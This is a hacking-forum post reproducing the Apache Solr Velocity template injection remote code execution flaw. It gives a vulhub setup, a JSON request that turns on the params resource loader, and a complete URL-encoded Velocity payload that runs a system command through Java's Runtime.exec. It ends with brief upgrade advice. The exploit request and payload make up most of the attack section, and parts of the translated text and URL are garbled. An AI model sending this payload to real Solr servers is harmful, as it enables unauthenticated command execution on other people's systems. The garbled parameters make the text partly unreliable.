Jump to content

Title: Apache Solr template injection remote code execution vulnerability

UKhackteam
UKhackteam
in Hacker Cracking / Penetration Testing / Cybersecurity

Featured Replies

Posted

Apache Solr 模板注入远程代码执行漏洞

Apache Solr is a search server based on Lucene (a full-text search engine) from the Apache Software Foundation in the United States. Apache Velocity is a template engine that provides HTML page templates, email templates, and universal open source code generator templates. In multiple versions of Apache Solr, the configuration parameters of the VelocityResponseWriter feature of Apache Solr can be specified via HTTP requests, causing users to execute any command by injecting any Velocity template after setting specific parameters.

影响范围

5.0.0=Apache Solr=8.3.1

环境搭建

You can recreate the solr environment of vulhub

1

2

docker-compose up -d

docker-compose exec solr bash bin/solr create_core -c test -d example/example-DIH/solr/db

Copy the jar package in contrib/velocity/lib that starts with velocity to server/solr-webapp/webapp/WEB-INF/lib/at :

20200102205848.png-water_print

Restart the solr service.

漏洞复现

When the above environmental conditions are met, exploiting this vulnerability is divided into two steps. First set the key parameter params.resource.loader.enabled to true through an HTTP request, so that any template code can be specified from the user's HTTP request. Then execute any command by specifying any Velocity template code. Since Solr does not enable authentication by default, in this case, the exploit does not require login credentials.

1

2

3

4

5

6

7

8

9

10

{

'update-queryresponsewriter': {

'startup': 'lazy',

'name': 'velocity',

'class': 'solr.VelocityResponseWriter',

'template.base.dir': '',

'solr.resource.loader.enabled': 'true',

'params.resource.loader.enabled': 'true'

}

}

20200102205509.png-water_print

Send payload:

Visit: http://IP:8983/solr/test/select?q=1wt=velocityv.template=customv.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set( $str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1.$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

20200102205954.png-water_print

The return result of executing the id command:

20200102210200.png-water_print 20200102210213.png-water_print

修复建议

Upgrade to Apache Solr 8.4

  • Quote

    • Join the conversation

    You can post now and register later. If you have an account, sign in now to post with your account.
    Note: Your post will require moderator approval before it will be visible.

    Guest
    Reply to this topic...
    Go to topic listing

    Important Information

    HackTeam Cookie PolicyWe have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.